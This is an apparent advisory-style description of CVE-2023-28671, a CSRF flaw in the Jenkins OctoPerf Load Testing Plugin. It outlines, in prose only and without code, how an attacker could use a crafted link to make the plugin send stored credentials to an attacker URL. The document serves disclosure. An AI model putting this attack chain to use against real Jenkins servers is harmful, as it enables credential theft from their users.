CVE-2023-28671

A cross-site request forgery (CSRF) vulnerability exists in the Jenkins OctoPerf Load Testing Plugin versions 4.5.0 and earlier [1][2]. The plugin fails to validate or require a CSRF token on certain endpoints, allowing an attacker to craft a malicious request that executes on behalf of an authenticated user without their consent [1].

To exploit this vulnerability, an attacker must first obtain valid credential IDs through another method (e.g., a separate information disclosure vulnerability). Then, the attacker tricks a Jenkins user with sufficient permissions into clicking a crafted link or visiting a malicious page [2]. This triggers the plugin to connect to an attacker-specified URL using the attacker-supplied credential IDs, effectively capturing any credentials stored in Jenkins that are associated with those IDs [1].

Successful exploitation allows the attacker to capture and exfiltrate credentials stored in Jenkins, potentially compromising all systems or services that those credentials protect [2]. The attack does not require the attacker to be authenticated to Jenkins, but relies on social engineering to induce a victim with the necessary access to perform the action [1].